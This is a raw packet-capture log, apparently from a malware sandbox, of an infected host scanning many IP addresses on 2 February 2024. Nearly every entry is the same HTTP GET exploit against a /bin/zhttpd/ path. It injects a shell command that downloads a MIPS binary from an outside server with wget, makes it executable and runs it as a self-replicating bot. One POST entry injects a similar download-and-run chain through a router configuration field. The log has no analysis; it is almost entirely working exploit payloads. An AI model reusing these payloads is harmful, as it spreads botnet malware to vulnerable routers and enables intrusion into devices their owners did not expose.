                                            Feb 2, 2024 06:21:17.728072882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5656192.168.2.155023884.31.123.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728123903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5657192.168.2.155748070.217.66.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728163004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5658192.168.2.153569842.121.135.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728203058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5659192.168.2.1555868120.37.158.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728230953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5660192.168.2.1536032136.203.176.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728264093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5661192.168.2.155308672.28.160.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728337049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5662192.168.2.1557070132.239.94.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728369951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5663192.168.2.1556146146.5.30.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728414059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5664192.168.2.154797824.226.212.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728446960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5665192.168.2.1555132173.136.153.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728497028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5666192.168.2.1554518180.226.164.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728523016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5667192.168.2.154140862.125.153.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728564978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5668192.168.2.1552732119.25.227.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.728594065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5669192.168.2.155326043.234.193.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.733445883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5670192.168.2.1551480208.9.131.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.733513117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5671192.168.2.1541202157.2.214.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.733546972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5672192.168.2.153303444.212.59.1538080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:17.804749012 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                            Feb 2, 2024 06:21:17.920670986 CET354INHTTP/1.1 400 Bad Request
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Fri, 02 Feb 2024 05:21:17 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Content-Length: 166
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5673192.168.2.1557834110.6.20.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741336107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5674192.168.2.1534092180.100.119.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741374016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5675192.168.2.1554948116.227.35.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741419077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5676192.168.2.153715254.13.5.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741451025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5677192.168.2.1550844108.119.54.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741471052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5678192.168.2.155367498.177.1.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741530895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5679192.168.2.1558226203.191.236.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741568089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5680192.168.2.1545048213.91.246.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741595984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5681192.168.2.154676225.72.132.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741628885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5682192.168.2.1558588109.92.58.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741674900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5683192.168.2.1539560147.178.86.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741698980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5684192.168.2.153432882.235.186.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741750002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5685192.168.2.1539622120.236.176.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741797924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5686192.168.2.154088079.130.146.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741849899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5687192.168.2.155128868.40.72.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741879940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5688192.168.2.153686685.157.181.102443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741923094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5689192.168.2.1557644181.108.63.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741946936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5690192.168.2.1532966117.128.0.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.741976976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5691192.168.2.15371324.255.86.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742002010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5692192.168.2.153748876.101.31.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742063999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5693192.168.2.154084287.215.156.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742100954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5694192.168.2.154735481.55.57.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742139101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5695192.168.2.1554374133.15.21.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742181063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5696192.168.2.154228870.231.154.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742238998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5697192.168.2.1544364115.105.226.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742257118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5698192.168.2.153806466.124.246.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742316008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5699192.168.2.154165820.84.68.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742352962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5700192.168.2.1539548200.2.224.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742377043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5701192.168.2.155850475.235.252.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742430925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5702192.168.2.1551448170.219.89.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742463112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5703192.168.2.153991266.31.160.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742523909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5704192.168.2.154060086.153.102.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742542028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5705192.168.2.154125284.235.120.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742573977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5706192.168.2.156088446.51.129.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742615938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5707192.168.2.1559354211.107.67.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742634058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5708192.168.2.1550292144.16.155.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742695093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5709192.168.2.154436834.218.218.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742727995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5710192.168.2.154998857.43.224.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742753029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5711192.168.2.155462484.13.79.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742825031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5712192.168.2.1534930133.211.40.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742866039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5713192.168.2.1532864134.20.131.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742907047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5714192.168.2.156090292.63.121.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.742957115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


